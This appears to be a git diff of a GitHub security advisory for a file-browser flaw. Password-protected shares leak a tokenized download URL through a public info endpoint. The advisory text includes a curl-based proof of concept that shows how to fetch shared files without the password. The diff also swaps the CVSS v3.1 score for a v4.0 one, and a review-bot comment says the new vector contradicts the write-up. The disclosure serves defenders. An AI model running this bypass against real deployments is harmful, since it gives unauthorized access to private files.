diff --git a/advisories/github-reviewed/2026/03/GHSA-525j-95gf-766f/GHSA-525j-95gf-766f.json b/advisories/github-reviewed/2026/03/GHSA-525j-95gf-766f/GHSA-525j-95gf-766f.json index c45a3c47053f7..cc85d4e8f97a1 100644 --- a/advisories/github-reviewed/2026/03/GHSA-525j-95gf-766f/GHSA-525j-95gf-766f.json +++ b/advisories/github-reviewed/2026/03/GHSA-525j-95gf-766f/GHSA-525j-95gf-766f.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-525j-95gf-766f", - "modified": "2026-03-18T18:31:13Z", + "modified": "2026-03-18T18:32:15Z", "published": "2026-03-09T19:48:12Z", "aliases": [ "CVE-2026-30933" 
@@ -10,8 +10,8 @@ "details": "### Summary\nThe remediation for CVE-2026-27611 appears incomplete. Password protected shares still disclose tokenized downloadURL via /public/api/share/info in docker image gtstef/filebrowser:1.3.1-webdav-2. \n\n\n### Details\nThe issue stems from two flaws:\n1. Tokenized download URLs are written into the persistent share model\n```\nbackend/http/share.go\nconvertToFrontendShareResponse(line 63)\ns.DownloadURL = getShareURL(r, s.Hash, true, s.Token)\n```\n2. The public endpoint:\n```\nGET /public/api/share/info\nreturns shareLink.CommonShare without clearing DownloadURL.\n```\n\nSince Token is set for password-protected shares, and getShareURL(..., true, token) embeds it as a query parameter, the public API discloses a valid bearer download capability.\n\nThe previous patch removed token generation in one handler but did not address the persisted DownloadURL values/Public reflection of existing DownloadURL\n\n\n### PoC\n1. Create a password protected share as an authenticated user \n\n2. Copy the public share URL (the clipboard WITHOUT an arrow) \n `http://yourdomain/public/share/yoursharedhash` \n Example: \n `http://yourdomain/public/share/2EBGbXgXg5dpw-nK0RG6vw` \n\n3. 
Query the public share endpoint via curl request: \n`curl 'http://yourdomain/public/api/share/info?hash=(your-share-hash)' -H 'Accept: */*' ` \nExample: \n`curl 'http://yourdomain/public/api/share/info?hash=2EBGbXgXg5dpw-nK0RG6vw' -H 'Accept: */*' ` \n \n Response includes:\n ```\n {\n \"shareTheme\": \"default\",\n \"title\": \"Shared files - test.md\",\n \"description\": \"A share has been sent to you to view or download.\",\n \"disableSidebar\": false,\n \"downloadURL\": \"http://yourdomain/public/api/resources/download?hash=2EBGbXgXg5dpw-nK0RG6vw\\u0026token=EGGYjfyMgqlqknDAIjXekI3DXJ40Nxht.5-q3gnZVbeJ1KYTc-gLb04N6smp-AH2-d4AUFLXgQ6I%3D\",\n \"shareURL\": \"http://yourdomain/public/share/2EBGbXgXg5dpw-nK0RG6vw\",\n \"enforceDarkLightMode\": \"default\",\n \"viewMode\": \"normal\",\n \"shareType\": \"normal\",\n \"sidebarLinks\": [\n {\n \"name\": \"Share QR Code and Info\",\n \"category\": \"shareInfo\",\n \"target\": \"#\",\n \"icon\": \"qr_code\"\n },\n {\n \"name\": \"Download\",\n \"category\": \"download\",\n \"target\": \"#\",\n \"icon\": \"download\"\n },\n {\n \"name\": \"sourceLocation\",\n \"category\": \"custom\",\n \"target\": \"/srv/test.md\",\n \"icon\": \"\"\n }\n ],\n \"hasPassword\": true,\n \"disableLoginOption\": false,\n \"sourceURL\": \"/srv/test.md\"\n }\n ```\nNote the response \"hasPassword\": true and downloadURL includes token= parameter\n\n\n4. 
Take the downloadURL(seen in json data response) and replace \\u0026 with & and paste link into Incognito or private browser to ensure cookies are not interfering \nExample:\n`http://yourdomain/public/api/resources/download?hash=2EBGbXgXg5dpw-nK0RG6vw&token=EGGYjfyMgqlqknDAIjXekI3DXJ40Nxht.5-q3gnZVbeJ1KYTc-gLb04N6smp-AH2-d4AUFLXgQ6I%3D`\n\nBrowser downloads file immediately without requiring password\n\n### Impact \nAn unauthenticated attacker can retrieve password protected shared files without the password.\nResults in authentication bypass, unauthorized file access and confidentiality compromise\n\n### Recommended Remediation\nSanitize DownloadURL in public share info responses via `commonShare.DownloadURL = \"\"` before returning the json response in shareInfoHandler method located in backend/share.go\n\nStructural fix, only generate tokenized URLs after successful password validation", "severity": [ { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N" } ], "affected": [
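Review bot: the new CVSS 4.0 vector in this hunk (UI:P and VI:L) contradicts the unchanged details field a few lines above it, which describes an unauthenticated `curl` to `/public/api/share/info?hash=...` followed by a direct GET of the returned `downloadURL` with no victim action involved, and whose Impact section lists only "unauthorized file access and confidentiality compromise"; the v3.1 vector being deleted here (`CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N`) scored exactly that, with UI:N and I:N. Either the details should say what passive user interaction and what integrity impact were found, or the v4 vector should read `UI:N` and `VI:N` to match the write-up. Separately, since `severity` is an array, consider keeping the `CVSS_V3` entry next to the new `CVSS_V4` one rather than replacing it, so consumers that still key on the v3 score do not lose it.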